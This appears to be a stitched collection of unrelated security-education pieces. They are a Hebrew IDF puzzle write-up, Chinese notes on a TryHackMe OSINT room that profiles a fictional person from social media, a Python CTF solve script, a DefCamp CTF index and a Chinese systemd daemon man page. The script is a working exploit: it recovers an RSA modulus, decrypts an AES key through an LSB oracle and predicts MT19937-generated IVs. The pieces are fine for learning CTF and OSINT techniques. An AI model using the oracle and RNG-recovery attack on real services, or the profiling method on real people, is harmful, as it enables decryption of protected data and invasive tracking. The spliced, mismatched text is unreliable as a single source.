!Dayenu, it would have sufficed us- If he had given us the Shabbat, and had not brought us before Mount Sinai !Dayenu, it would have sufficed us- If he had brought us before Mount Sinai, and had not given us the Torah !Dayenu, it would gave sufficed us- If he had given us the Torah, and had not brought us into the land of Israel !Dayenu, it would have sufficed us- If he had not brought us into the land of Israel, and had not built for us the Beit Habechiroh (Chosen House; the Beit Hamikdash) !Dayenu, it would have sufficed us- Who said + __________? = www.idf.il/_____/י/ </pre> <p> *שימו לב: יש להעתיק מכאן את הקישור לאחר שהזנתם את התשובה. התשובה היא בעברית </p> <h3>פתרון</h3> <p> ניתן לזהות בקלות שמדובר כאן במילות שיר הפסח "דיינו" בתרגום לאנגלית, אלא שעיון מדוקדק יותר מגלה מספר שינויים קלים בשיר: </p> <ul dir="ltr"> <li>If he had given us their wealth, and had not split the <span style="color: red">t</span>ea for us</li> <li>If he had supplied our needs in the desert for forty <span style="color: red">p</span>ears, and had not led us the manna</li> </ul> <p> נוכל לקחת את הטקסט המקורי מ<a href="https://en.wikipedia.org/wiki/Dayenu">ויקיפדיה</a> ולהשוות. </p> <p> בטקסט שלקחנו מויקיפדיה נבצע מספר התאמות קלות על מנת להקל על ההשוואה. בשורת "דיינו", נשנה את "He" ל-"he", ונמיר בנוסף את סימן הקריאה בסוף המשפט ל-"us-" כמו הנוסח שבחרו באמ"ן. השינויים האלו לא נדרשים אבל הם יקלו על זיהוי ההבדלים המהותיים. </p> <p> נשווה ונקבל: </p> ![](images/diff.png) <p> נוכל לקבל את ההבדלים באמצעות הפקודה הבאה: </p> <pre style="text-align: left" dir="ltr"> root@kali:/media/sf_CTFs/aman/1# cmp -l their.txt original.txt | gawk '{printf "%c", strtonum(0$2)}' && echo cmp: EOF on original.txt after byte 1619 letmypeoplegnot brought us intothe land of Israel,andhad not built for us th Beit Habechiroh (Chosen House; the Beit Ham </pre> <p> ניתן לראות שהשורה האחרונה שונה באופן מהותי, מה ש"מלכלך" את ההשוואה, אבל לפני כן אפשר לראות בבירור את הביטוי "letmypeoplego", או בעברית "שלח את עמי". </p> <p> הביטוי נאמר על ידי משה, נמלא שם זה בקישור ונעבור לשלב הבא: </p> `https://www.idf.il/%D7%9E%D7%A9%D7%94/%D7%99/` <h2>חלק שני</h2> <h3>תיאור</h3> <div> יש מי שחושב שסיפור יציאת מצרים הוא פנטזיה, אך תוך כדי ויכוח טוב, תוכלו להראות את העובדה הבאה ולהוכיח, שאין זו... "בט.טזחובד, גא.____טו" בסמוך תמצאו עיר שמסמלת ניצחון כואב יודעים במה מדובר? כנראה שאתם מספיק חדים כדי לדעת לאן לשלוח את התשובה </div> <h3>פתרון</h3> <p> נראה סביר מאוד שמדובר בצופן החלפה כלשהו. אחרי בדיקת צפנים בסיסיים כגון אתב"ש, נשים לב שהחידה כוללת אותיות בין א' ל-ט' בלבד. נראה הגיוני להחליף את האותיות בספרות. החידה כוללת גם קטע שעלינו להשלים בעצמנו. לפי קטע הפתיחה, הגיוני להשלים את המילה "אגדה" שמסתדרת עם המשך הביטוי "אין זו..." וגם עם ההקשר. </p> <p> אם כך: </p> ``` בט.טזחובד, גא.____טו --> בט.טזחובד, גא.אגדהטו --> 695431.13 ,426879.92 ``` <p> אם נהפוך את סדר התווים, נקבל קוארדינטות: </p> ``` 29.978624, 31.134596 ``` נכניס לגוגל מפות ונראה: ![](images/coords.png) <p> בסמוך לקוארדינטות שוכנת העיר "השישה באוקטובר", הקרויה על שם תאריך הפתיחה של מלחמת יום הכיפורים. זהו ה"ניצחון הכואב" שעליו תיאור האתגר מדבר. </p> <h2>חלק שלישי</h2> <h3>תיאור</h3> <p> כעת כל שנותר לנו הוא למצוא את כתובת המייל אליה יש לשלוח את התשובה. </p> <h3>פתרון</h3> <p> זהו הבאנר של האתגר באתר צה"ל: </p> ![](images/aman.jpg) <p> בתחתית הבאנר ניתן לראות קוד מורס </p> ``` .... .. -.. .- .-.-.- .. -.. ..-. .-.-.- .- -- .- -. .--.-. --. -- .- .. .-.. .-.-.- -.-. --- -- ``` נפענח את הקוד ונקבל את כתובת המייל. <h2>קישורים</h2> <ul> <li><a href="https://www.idf.il/129495/">החידה באתר צה"ל</a></li> <li><a href="https://www.ynet.co.il/news/article/SJQbUBqEO">כתבה ב-YNet</a> </ul> </div>
sec-knowleage
# 社交媒体情报搜集实战 本篇是对[TryHackMe:KaffeeSec-SoMeSINT](https://www.secjuice.com/try-hack-me-kaffeesec-somesint/)的学习笔记。该文主要提供了一个完整的,通过社交媒体数据进行情报搜集、分析和取证的实例。 ## 目标 > 1. Investigate and analyze the person of interest to uncover facts and information. > 2. Learn to use OSINT tools and techniques such as Google Dorking, website archiving, social media information gathering/enumeration & Analysis. > 3. Apply the skills that you have learned throughout this write-up while attempting CTFs and while addressing real-world investigations related to social media. ## 素材 > You are Aleks Juulut, a private eye based out of Greenland. You don't usually work digitally, but have recently discovered OSINT techniques to make that aspect of your job much easier. You were recently hired by a mysterious person under the moniker "H" to investigate a suspected cheater, named Thomas Straussman. After a brief phone-call with his wife, Francesca Hodgerint, you've learned that he's been acting suspicious lately, but she isn't sure exactly what he could be doing wrong. She wants you to investigate him and report back anything you find. Unfortunately, you're out of the country on a family emergency and cannot get back to Greenland to meet the deadline of the investigation, so you're going to have to do all of it digitally. ## 挑战任务 ### Task 1 >谁雇用了您,您正在调查谁? - 雇主:“H” - 调查目标:“Thomas Straussman” - 妻子:“Francesca Hodgerint” ### Task 2 > 在最初的调查中,我们发现我们的目标在两个不同的社交媒体平台上都被**冠以“ tstraussman”**的名称,**这些**平台不久将被揭露。 在Google中通过关键词搜索,发现该调查目标(后称“目标”)注册了Twitter和Reddit。 <img src="https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518191317783.png" alt="image-20210518191317783" style="zoom: 67%;" /> 以下是[目标在twitter上的个人信息页](https://twitter.com/TStraussman)。注意其中的昵称、账户号以及定位,这三者帮助我们确定目标。个人签名、所发Twitter的内容、浏览点赞的记录,可以帮助我们确定目标的生活兴趣、个人性格等。 <img src="https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518191625107.png" alt="image-20210518191625107" style="zoom: 67%;" /> 以下是[目标在Reddit上的个人信息页](https://www.reddit.com/user/Tstraussman/comments/kh1pzg/big_thank_you/): ![image-20210518192307703](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518192307703.png) #### Q1 > Q1: **托马斯最喜欢的假期是什么?** > > **What is Thomas's favorite holiday?** 从目标在twitter的签名,可以推测目标最喜欢圣诞节。 ![image-20210518192044840](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518192044840.png) **A1: Christmas** #### Q2 > Q2: **托马斯的生日是几岁?(**格式为MM-DD-YYYY **)** > > **What is Thomas's birth date? (**Format is MM-DD-YYYY**)** 从社交媒体上的信息来看,没有直接显示生日的信息。尝试其他角度。 - 翻阅目标发布的twitter内容、Likes和回复 - 内容未发现直接的信息 - Likes中发现[其妻子的Twitter](https://twitter.com/FHodgelink) - 翻阅目标妻子的Twitter,未发现直接信息 - 回复中未发现直接的信息 - 在目标的Reddit上搜集信息 发现目标在reddit上发的帖子,透露目标4个月前表示其“30岁”生日,因此推测其出生年份为:`1991`年。 <img src="https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518194205937.png" alt="image-20210518194205937" /> 鼠标悬停在帖子发布时间上,可以显示详细时间: ![image-20210518194623363](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518194623363.png) 帖子发布时间为2020年,12月21日。因此推翻直接1991年生日的推测,根据周岁计算,目标生日为:`12-21-1990`。 但要特别注意的是,Reddit显示的地区时间是中国标准时间,我们应该根据目标所在地进行时间调整。 目标所在地为:Nuuk, Greenland,使用格陵兰岛西部夏令时间(Western Greenland Summer Time (WGST)),比北京时间落后10小时,因此,其帖子发布时间为格陵兰岛西部夏令时间:`12-20-2021, 18:32:57`, 根据周岁计算,其生日为格陵兰岛西部夏令时间的`12-20-1990`。 这个日期也与Reddit的cake day相吻合: ![image-20210518200508271](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20210518200508271.png) **A2: 12-20-1990 WGST ** #### Q3 > **托马斯未婚妻的Twitter账号是什么?** > > **What is Thomas' fiancée’s Twitter handle?** A2中已经搜集。 **A3: Francesca Hodgelink,@FHodgelink,[Twitter Link](https://twitter.com/FHodgelink)** #### Q4 > 托马斯的背景图片是什么? > > **What is Thomas' background picture of?** 结合twitter的签名、和图片造型,可得其出:Buddha(佛) **A4: Buddha** ### Task 3 // TODO
sec-knowleage
import gmpy2 import re from Crypto.Cipher import AES from MTRecover import MT19937Recover from crypto_commons.generic import factor, long_to_bytes, chunk, bytes_to_long from crypto_commons.netcat.netcat_commons import nc, receive_until_match, send from crypto_commons.oracle.lsb_oracle import lsb_oracle_from_bits def unpad(s): n = ord(s[-1]) return s[:-n] def aes_decrypt(s, aeskey): iv = s[:16] aes = AES.new(aeskey, AES.MODE_CBC, iv) return unpad(aes.decrypt(s[16:])) def lsb_oracle(encrypted_data, multiplicator, upper_bound, oracle_fun): def bits_provider(): ciphertext = encrypted_data for i in range(895): # 1024 - 128 = 896 ciphertext = multiplicator(ciphertext) yield 0 while True: ciphertext = multiplicator(ciphertext) yield oracle_fun(ciphertext) return lsb_oracle_from_bits(upper_bound, bits_provider()) def oracle(s, ct): send(s, '2') print(receive_until_match(s, 'input hexencoded cipher text: ')) payload = long_to_bytes(ct).encode("hex") print("Sending payload", payload) send(s, payload) r = receive_until_match(s, 'RSA: .*\n') receive_until_match(s, '4: get encrypted key\n') bit = int(re.findall('RSA: (.*)\n', r)[0], 16) & 1 return bit def recover_aes_key(n, s): send(s, '4') r = receive_until_match(s, "here is encrypted key :\)\n.+\n") encrypted_aes_key = re.findall("here is encrypted key :\)\n(.*)\n", r)[0] print('aes key', encrypted_aes_key) decrypted_aes_key = lsb_oracle(int(encrypted_aes_key, 16), lambda ct: ct * pow(2, 65537, n) % n, n, lambda ct: oracle(s, ct)) decrypted_aes_key = long_to_bytes(int(decrypted_aes_key)) return decrypted_aes_key def recover_n(s): send(s, '1') print(receive_until_match(s, "input plain text: ")) send(s, '\2') r = receive_until_match(s, "4: get encrypted key\n") print(r) pow2e = int(re.findall('RSA: (.*)\n', r)[0], 16) send(s, '1') print(receive_until_match(s, "input plain text: ")) send(s, '\3') r = receive_until_match(s, "4: get encrypted key\n") print(r) pow3e = int(re.findall('RSA: (.*)\n', r)[0], 16) n = gmpy2.gcd(2 ** 65537 - pow2e, 3 ** 65537 - pow3e) n = factor(n)[1] assert pow(2, 65537, n) == pow2e return n def get_iv(s): send(s, '1') print(receive_until_match(s, "input plain text: ")) send(s, 'A') r = receive_until_match(s, "4: get encrypted key\n") print(r) aes_iv = re.findall('AES: (.*)\n', r)[0][:32].decode("hex") return aes_iv def collect_outputs(s): out = [] for i in range(160): aes_iv = get_iv(s) out.extend(map(bytes_to_long, chunk(aes_iv, 4))[::-1]) return out def recover_next_iv(s): outputs = collect_outputs(s) mtr = MT19937Recover() r2 = mtr.go(outputs) iv = long_to_bytes(r2.getrandbits(16 * 8)) sanity = get_iv(s) assert sanity == iv return long_to_bytes(r2.getrandbits(16 * 8)).encode("hex") def main(): url = "crypto.chal.ctf.westerns.tokyo" port = 5643 s = nc(url, port) print(receive_until_match(s, "4: get encrypted key")) n = recover_n(s) print('n', n) decrypted_aes_key = recover_aes_key(n, s) print('aes key', decrypted_aes_key.encode("hex")) next_iv_hex = recover_next_iv(s) print('next iv', next_iv_hex) send(s, '3') r = receive_until_match(s, "4: get encrypted key\n") flag_ct = re.findall("another bulldozer is coming!\n(.*)\n", r)[0][32:] print('encrypted flag', next_iv_hex + flag_ct) print(aes_decrypt((next_iv_hex + flag_ct).decode("hex"), decrypted_aes_key)) s.close() main()
sec-knowleage
# Writeup DefCamp CTF Finals 2015 ![](./IMG_20151119_104301.jpg) # Spis treści: * [web 200](web200) * [crypto 100 (Morse c'est)](crypto100) * [crypto 300](crypto300) * [crypto 400](crypto400) * [reverse 200 (Time is not your friend)](re_200_time_is_not_your_friend) * [reverse 300 (Try harder)](re_300_tryharder) ### ENG version # Table of contents: * [web 200](web200#eng-version) * [crypto 100 (Morse c'est)](crypto100#eng-version) * [crypto 300](crypto300#eng-version) * [crypto 400](crypto400#eng-version) * [reverse 200 (Time is not your friend)](re_200_time_is_not_your_friend#eng-version) * [reverse 300 (Try harder)](re_300_tryharder#eng-version)
sec-knowleage
'\" t .TH "DAEMON" "7" "" "systemd 231" "daemon" .\" ----------------------------------------------------------------- .\" * Define some portability stuff .\" ----------------------------------------------------------------- .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\" http://bugs.debian.org/507673 .\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \n(.g .ds Aq \(aq .el .ds Aq ' .\" ----------------------------------------------------------------- .\" * set default formatting .\" ----------------------------------------------------------------- .\" disable hyphenation .nh .\" disable justification (adjust text to left margin only) .ad l .\" ----------------------------------------------------------------- .\" * MAIN CONTENT STARTS HERE * .\" ----------------------------------------------------------------- .SH "NAME" daemon \- 编写与打包系统守护进程 .SH "描述" .PP "守护进程"的意思是在后台运行的服务进程, 常用于监督系统的运行或者提供某种功能。 在传统的 SysV Unix 系统上, 多个守护进程必须严格按照特定的顺序依次启动。 在"新型"的 \fBsystemd\fR(1) 系统上, 守护进程的启动顺序非常简单且非常强大。 本手册同时解说了上述两种不同的启动方案, 并特别推荐了应该包含在 systemd 系统中的守护进程。 .SS "传统的SysV守护进程" .PP 传统的SysV守护进程在启动的时候, 应该在初始化阶段执行下面的步骤: .sp .RS 4 .ie n \{\ \h'-04' 1.\h'+01'\c .\} .el \{\ .sp -1 .IP " 1." 4.2 .\} 关闭除 STDIN STDOUT STDERR 之外的所有文件描述符 .RE .sp .RS 4 .ie n \{\ \h'-04' 2.\h'+01'\c .\} .el \{\ .sp -1 .IP " 2." 4.2 .\} 重置所有信号处理器 .RE .sp .RS 4 .ie n \{\ \h'-04' 3.\h'+01'\c .\} .el \{\ .sp -1 .IP " 3." 4.2 .\} 重置所有信号掩码 .RE .sp .RS 4 .ie n \{\ \h'-04' 4.\h'+01'\c .\} .el \{\ .sp -1 .IP " 4." 4.2 .\} 清理环境变量(重置一部分,移除一部分) .RE .sp .RS 4 .ie n \{\ \h'-04' 5.\h'+01'\c .\} .el \{\ .sp -1 .IP " 5." 4.2 .\} 调用 \fBfork()\fR 创建一个后台进程 .RE .sp .RS 4 .ie n \{\ \h'-04' 6.\h'+01'\c .\} .el \{\ .sp -1 .IP " 6." 4.2 .\} 在子进程中调用 \fBsetsid()\fR 从终端脱离并创建一个独立的会话 .RE .sp .RS 4 .ie n \{\ \h'-04' 7.\h'+01'\c .\} .el \{\ .sp -1 .IP " 7." 4.2 .\} 在子进程中再一次调用 \fBfork()\fR 以确保守护进程永远无法获取任何终端。 .RE .sp .RS 4 .ie n \{\ \h'-04' 8.\h'+01'\c .\} .el \{\ .sp -1 .IP " 8." 4.2 .\} 第一个子进程主动退出, 只有第二个子进程(实际的守护进程)保持运行, 并且以 init(PID=1) 为父进程。 .RE .sp .RS 4 .ie n \{\ \h'-04' 9.\h'+01'\c .\} .el \{\ .sp -1 .IP " 9." 4.2 .\} 守护进程(第二个子进程)将 STDIN STDOUT STDERR 连接到 /dev/null 虚拟设备 .RE .sp .RS 4 .ie n \{\ \h'-04'10.\h'+01'\c .\} .el \{\ .sp -1 .IP "10." 4.2 .\} 守护进程将 umask 设为 0 .RE .sp .RS 4 .ie n \{\ \h'-04'11.\h'+01'\c .\} .el \{\ .sp -1 .IP "11." 4.2 .\} 守护进程将当前目录切换到根目录(/) .RE .sp .RS 4 .ie n \{\ \h'-04'12.\h'+01'\c .\} .el \{\ .sp -1 .IP "12." 4.2 .\} 守护进程将自身的PID记录到例如 /run/foobar\&.pid 这样的文件中 .RE .sp .RS 4 .ie n \{\ \h'-04'13.\h'+01'\c .\} .el \{\ .sp -1 .IP "13." 4.2 .\} 守护进程丢弃自己不需要的权限(如果可以) .RE .sp .RS 4 .ie n \{\ \h'-04'14.\h'+01'\c .\} .el \{\ .sp -1 .IP "14." 4.2 .\} 守护进程通知最初的父进程:初始化工作已完成 .RE .sp .RS 4 .ie n \{\ \h'-04'15.\h'+01'\c .\} .el \{\ .sp -1 .IP "15." 4.2 .\} 最初的父进程自身退出 .RE .PP 注意,这些步骤对于下文讲述的新型守护进程是不需要的, 除非为了刻意兼容传统的SysV系统。 .SS "新型守护进程" .PP Linux 系统上的新型守护进程更容易被监控也更容易实现。 .PP 守护进程无需实现前文所描述的复杂步骤, 即可直接在 systemd 提供的干净的上下文环境中运行: .PP 环境变量已经被清理、信号处理器与信号掩码已经被重置、没有遗留的文件描述符、守护进程自动在其专属的会话中执行、 标准输入(STDIN)已被连接到 /dev/null 虚拟设备(除非另有配置)、 标准输出(STDOUT)与标准错误(STDERR)已被连接到 \fBsystemd-journald.service\fR(8) 日志服务(除非另有配置)、umask 已经被重置 \&.\&.\&. 等等 .PP 新型守护进程只需要遵守如下要求: .sp .RS 4 .ie n \{\ \h'-04' 1.\h'+01'\c .\} .el \{\ .sp -1 .IP " 1." 4.2 .\} 收到 \fBSIGTERM\fR 信号后 关闭进程并确保干净的退出 .RE .sp .RS 4 .ie n \{\ \h'-04' 2.\h'+01'\c .\} .el \{\ .sp -1 .IP " 2." 4.2 .\} 收到 \fBSIGHUP\fR 信号后 重新加载配置文件(若需要) .RE .sp .RS 4 .ie n \{\ \h'-04' 3.\h'+01'\c .\} .el \{\ .sp -1 .IP " 3." 4.2 .\} 主守护进程在退出时应该按照 \m[blue]\fBLSB recommendations for SysV init scripts\fR\m[]\&\s-2\u[1]\d\s+2 的要求返回恰当的退出码, 以便于 systemd 判断服务的退出状态。 .RE .sp .RS 4 .ie n \{\ \h'-04' 4.\h'+01'\c .\} .el \{\ .sp -1 .IP " 4." 4.2 .\} 若可行,在初始化的最后一步, 通过 D\-Bus 创建进程的控制接口, 并在 D\-Bus 上注册一个总线名称。 .RE .sp .RS 4 .ie n \{\ \h'-04' 5.\h'+01'\c .\} .el \{\ .sp -1 .IP " 5." 4.2 .\} 提供一个 \&.service 单元文件, 包含如何启动/停止/维护该服务的配置。 详见 \fBsystemd.service\fR(5) 手册。 .RE .sp .RS 4 .ie n \{\ \h'-04' 6.\h'+01'\c .\} .el \{\ .sp -1 .IP " 6." 4.2 .\} 尽可能依赖于 systemd 的资源控制与权限剥夺功能 (CPU与内存占用/文件访问等等), 而不要自己实现它们。 详见 \fBsystemd.exec\fR(5) 手册。 .RE .sp .RS 4 .ie n \{\ \h'-04' 7.\h'+01'\c .\} .el \{\ .sp -1 .IP " 7." 4.2 .\} 若使用了 D\-Bus , 则强烈推荐使用基于 D\-Bus 的启动机制。 这样做有许多好处: 守护进程可以按需延迟启动; 可以和依赖于它的进程并行启动(提升启动速度); 守护进程可以在失败时被自动重启 而不丢失D\-Bus总线上的请求(详见下文) .RE .sp .RS 4 .ie n \{\ \h'-04' 8.\h'+01'\c .\} .el \{\ .sp -1 .IP " 8." 4.2 .\} 若守护进程通过套接字提供服务, 则强烈推荐使用基于套接字的启动机制(详见下文)。 这样做有许多好处: 守护进程可以按需延迟启动; 可以和依赖于它的进程并行启动(提升启动速度); 对于无状态协议(例如 syslog, DNS), 守护进程可以在失败时被自动重启而不丢失套接字上的请求(详见下文) .RE .sp .RS 4 .ie n \{\ \h'-04' 9.\h'+01'\c .\} .el \{\ .sp -1 .IP " 9." 4.2 .\} 若可能,守护进程应该通过 \fBsd_notify\fR(3) 接口通知 systemd "启动已完成"或"状态已更新"这样的消息。 .RE .sp .RS 4 .ie n \{\ \h'-04'10.\h'+01'\c .\} .el \{\ .sp -1 .IP "10." 4.2 .\} 不要使用 \fBsyslog()\fR 记录日志, 只需简单的使用 \fBfprintf()\fR 向 STDERR 输出日志即可。 如果必须指明日志等级, 则可以在日志的 行首加上类似 "<4>" 这样的前缀即可(这里表示4级"WARNING")。 详见 \fBsd-daemon\fR(3) 与 \fBsystemd.exec\fR(5) 手册。 .RE .PP 上述要求与 \m[blue]\fBApple MacOS X Daemon Requirements\fR\m[]\&\s-2\u[2]\d\s+2 类似, 但并不完全相同。 .SH "启动" .PP systemd 提供了多种启动机制(见下文), 而服务单元也经常同时使用其中的几种。 例如 bluetoothd\&.service 可以在插入蓝牙硬件时被启动, 也可以在某进程访问其 D\-Bus 接口时被启动。 又如打印服务可以在IPP端口有流量接入时被启动, 也可以在插入打印机硬件时被启动, 还可以在有文件进入打印机 spool 目录时被启动。 甚至对于必须在系统启动时无条件启动的服务, 为了尽可能并发启动, 也应该使用某些启动机制。 如果某守护进程实现了一个 D\-Bus 服务或者监听一个套接字, 那么使用基于 D\-Bus 或基于套接字的启动机制, 将允许该进程与其客户端同时并行启动(从而加快启动速度)。 因为所有的通信渠道都已事先建立, 并且不会丢失任何客户端请求, 同时 D\-Bus 总线或者内核会将客户端请求排入队列等候, 直到完成启动。 .SS "系统启动时启动" .PP 传统的守护进程一般是在系统启动时通过SysV初始化脚本自动启动, systemd 也支持这种启动方式。 .PP 对于 systemd 来说, 如果希望确保某单元在系统启动时自动启动, 那么最佳的做法是在默认启动目标 (通常是 multi\-user\&.target 或 graphical\&.target)的 \&.wants/ 目录中为该单元建立软链接。 参见 \fBsystemd.unit\fR(5) 手册以了解 \&.wants/ 目录, 参见 \fBsystemd.special\fR(7) 手册以了解上述两个特殊的启动目标。 .SS "基于套接字的启动" .PP 为了尽可能提高并行性与健壮性, 以及简化配置与开发, 对于需要监听套接字的服务, 强烈推荐使用基于套接字的启动机制。 使用此机制后, 守护进程不再需要创建和绑定套接字, 而是由 systemd 接管这个工作。 systemd 将会根据单元文件的设置, 预先创建所需的套接字, 并在第一个客户端请求接入的时候启动该服务, 以实现服务的按需启动。 该机制的好处还在于, 预先创建好套接字之后, 所有使用此套接字通信的进程可以并行启动(包括客户端和服务端)。 此外,重启服务只会导致丢失最低限度的客户端连接, 甚至不丢失任何客户端请求 (例如对于 DNS 或 syslog 这样的无状态协议)。 因为套接字在服务重启期间始终保持有效并且可被访问, 同时所有客户端请求也都被排入队列等候处理。 .PP 使用此机制之后, 守护进程必须要从 systemd 接收已创建好的套接字, 而不能自己创建并绑定套接字。 关于如何使用该机制,参见 \fBsd_listen_fds\fR(3) 与 \fBsd-daemon\fR(3) 手册。 只需要小小的修改, 即可在原有启动机制的基础上添加基于套接字的启动机制, 至于如何移植,详见后文。 .PP systemd 通过 \&.socket 单元实现该机制,详见 \fBsystemd.socket\fR(5) 手册。 必须确保所有为支持基于套接字启动而创建的监听 socket 单元都被包含在 sockets\&.target 中。 建议在 socket 单元的 "[Install]" 小节加入 \fIWantedBy=sockets\&.target\fR 设置, 以确保在启用该单元时能够自动添加上述依赖关系。 除非明确设置了 \fIDefaultDependencies=no\fR , 否则会为所有 socket 单元隐含的创建必要的顺序依赖。 有关 sockets\&.target 的解释,详见 \fBsystemd.special\fR(7) 手册。 如果某 socket 单元已被包含在 sockets\&.target 中, 那么不建议在其中再添加任何额外的依赖关系(例如 multi\-user\&.target 之类)。 .SS "基于 D\-Bus 的启动" .PP 如果守护进程使用 D\-Bus 与客户端通信, 那么它应该使用基于 D\-Bus 的启动机制, 这样当客户端访问其 D\-Bus 接口时, 该服务将被自动启动。 该机制是通过 D\-Bus service 文件实现的(不要与普通的单元文件混淆)。 为了确保让 D\-Bus 使用 systemd 来启动与维护守护进程, 必须在这些 D\-Bus service 文件中使用 \fISystemdService=\fR 指明其匹配的服务单元。 例如,对于文件名为 org\&.freedesktop\&.RealtimeKit\&.service 的 D\-Bus service 来说, 为了将其绑定到 rtkit\-daemon\&.service 服务单元, 必须确保在该文件中设置了 \fISystemdService=rtkit\-daemon\&.service\fR 指令。 注意,必须明确设置 \fISystemdService=\fR 指令, 否则当服务单元同时使用多种启动机制时, 可能会导致竞争条件的出现。 .SS "基于设备的启动" .PP 用于管理特定类型硬件的守护进程, 只应该在符合条件的硬件变为可用或者被插入时,才需要启动。 为了达到上述目的, 可以将服务的启动/停止与硬件的插入/拔出事件绑定。 当带有 "systemd" 标签的设备出现在 sysfs/udev 设备树中时, systemd 将会自动为其创建对应的 device 单元。 通过向这些单元中添加对其他单元的 \fIWants=\fR 依赖, 就可以实现当该 device 单元被启动(也就是硬件被插入)时, 连带启动其他单元,从而实现基于设备的启动。 这可以通过向 udev 规则库中添加 \fISYSTEMD_WANTS=\fR 属性来实现, 详见 \fBsystemd.device\fR(5) 手册。 通常,并不是将 service 单元直接添加到设备的 \fIWants=\fR 依赖中, 而是通过专用的 target 单元间接添加。 例如,不是将 bluetoothd\&.service 添加到各种蓝牙设备的 \fIWants=\fR 依赖中, 而是将 bluetoothd\&.service 添加到 bluetooth\&.target 的 \fIWants=\fR 依赖中, 同时再将 bluetooth\&.target 添加到各种蓝牙设备的 \fIWants=\fR 依赖中。 通过引入 bluetooth\&.target 这个抽象层, 系统管理员无需批量修改 udev 规则库, 仅通过 \fBsystemctl enable|disable \&.\&.\&.\fR 命令 修改 bluetooth\&.target\&.wants/ 目录中的软链接, 即可控制 bluetoothd\&.service 的使用。 .SS "基于路径的启动" .PP 对于处理 spool 文件或目录的守护进程(例如打印服务)来说, 仅在 spool 文件或目录状态发生变化或者内容非空时, 才需要启动。 通过 \&.path 单元实现的、 基于路径的启动机制正好适用于这种场合, 详见 \fBsystemd.path\fR(5) 手册。 .SS "基于定时器的启动" .PP 对于周期性的操作(例如垃圾文件清理或者网络对时), 可以通过基于定时器的启动机制来实现。 这种机制通过 \&.timer 单元实现,详见 \fBsystemd.timer\fR(5) 手册。 .SS "其他启动方式" .PP 在其他操作系统上还存在着其他的启动机制, 不过这些机制都可以被前述的各种机制的组合替代。 因此在这里不再赘述。 .SH "与 SYSTEMD 整合" .SS "编写 systemd 单元文件" .PP 在编写单元文件时应当考虑下列建议: .sp .RS 4 .ie n \{\ \h'-04' 1.\h'+01'\c .\} .el \{\ .sp -1 .IP " 1." 4.2 .\} 尽可能不用 \fIType=forking\fR 。 若非用不可,则必须正确设置 \fIPIDFile=\fR 指令。参见 \fBsystemd.service\fR(5) 手册。 .RE .sp .RS 4 .ie n \{\ \h'-04' 2.\h'+01'\c .\} .el \{\ .sp -1 .IP " 2." 4.2 .\} 若守护进程在 D\-Bus 上注册了一个名字, 则应尽可能使用 \fIType=dbus\fR .RE .sp .RS 4 .ie n \{\ \h'-04' 3.\h'+01'\c .\} .el \{\ .sp -1 .IP " 3." 4.2 .\} 设置一个易于理解的 \fIDescription=\fR .RE .sp .RS 4 .ie n \{\ \h'-04' 4.\h'+01'\c .\} .el \{\ .sp -1 .IP " 4." 4.2 .\} 确保 \fIDefaultDependencies=yes\fR , 除非该单元必须在系统启动的早期启动或者必须在系统关闭的末期关闭。 .RE .sp .RS 4 .ie n \{\ \h'-04' 5.\h'+01'\c .\} .el \{\ .sp -1 .IP " 5." 4.2 .\} 通常无需显式定义依赖关系。 不过,如果确实需要显式定义依赖关系, 为了确保单元文件不局限于特定的发行版,仅应该依赖于 \fBsystemd.special\fR(7) 中列出的单元以及自身所属软件包中提供的单元。 .RE .sp .RS 4 .ie n \{\ \h'-04' 6.\h'+01'\c .\} .el \{\ .sp -1 .IP " 6." 4.2 .\} 确保在 "[Install]" 小节中包含完整的启用信息(参见 \fBsystemd.unit\fR(5) 手册)。 若希望自动启动该单元, 则应该设置 \fIWantedBy=multi\-user\&.target\fR 或 \fIWantedBy=graphical\&.target\fR 若希望自动启动该单元的套接字,则应该设置 \fIWantedBy=sockets\&.target\fR 。 通常你还希望在启用该单元时, 一起启用对应的套接字单元(假定为 foo\&.service), 因此还应该设置 \fIAlso=foo\&.socket\fR .RE .SS "安装 service 单元文件" .PP 当从源代码编译安装(\fBmake install\fR)软件包时, 其中的系统服务单元文件会被默认安装到 \fBpkg\-config systemd \-\-variable=systemdsystemunitdir\fR 命令返回的目录中(通常是 /usr/lib/systemd/system); 而其中的用户服务单元文件会被默认安装到 \fBpkg\-config systemd \-\-variable=systemduserunitdir\fR 命令返回的目录中(通常是 /usr/lib/systemd/user); 但并不应该使用 \fBsystemctl enable \&.\&.\&.\fR 命令启用它们。 当从包管理器安装(\fBrpm \-i\fR)二进制软件包时, 其中的单元文件应该同样安装到上述位置。 但不同之处在于, 还应该使用 \fBsystemctl enable \&.\&.\&.\fR 命令启用它们, 因此安装的单元有可能会在开机时自动启动。 .SH "移植已有的守护进程" .PP 虽然 systemd 兼容传统的 SysV 初始化系统, 但是移植旧有的守护进程可以更好的利用 systemd 的先进特性。 建议对旧有的 SysV 守护进程做如下改进: \&.\&.\&.[省略]\&.\&.\&. .SH "放置守护进程的数据" .PP 建议遵守 \fBfile-hierarchy\fR(7) 所建议的通用准则。 .SH "参见" .PP \fBsystemd\fR(1), \fBsd-daemon\fR(3), \fBsd_listen_fds\fR(3), \fBsd_notify\fR(3), \fBdaemon\fR(3), \fBsystemd.service\fR(5), \fBfile-hierarchy\fR(7) .SH "NOTES" .IP " 1." 4 LSB recommendations for SysV init scripts .RS 4 \%http://refspecs.linuxbase.org/LSB_3.1.1/LSB-Core-generic/LSB-Core-generic/iniscrptact.html .RE .IP " 2." 4 Apple MacOS X Daemon Requirements .RS 4 \%https://developer.apple.com/library/mac/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html .RE .\" manpages-zh translator: 金步国 .\" manpages-zh comment: 金步国作品集:http://www.jinbuguo.com
sec-knowleage
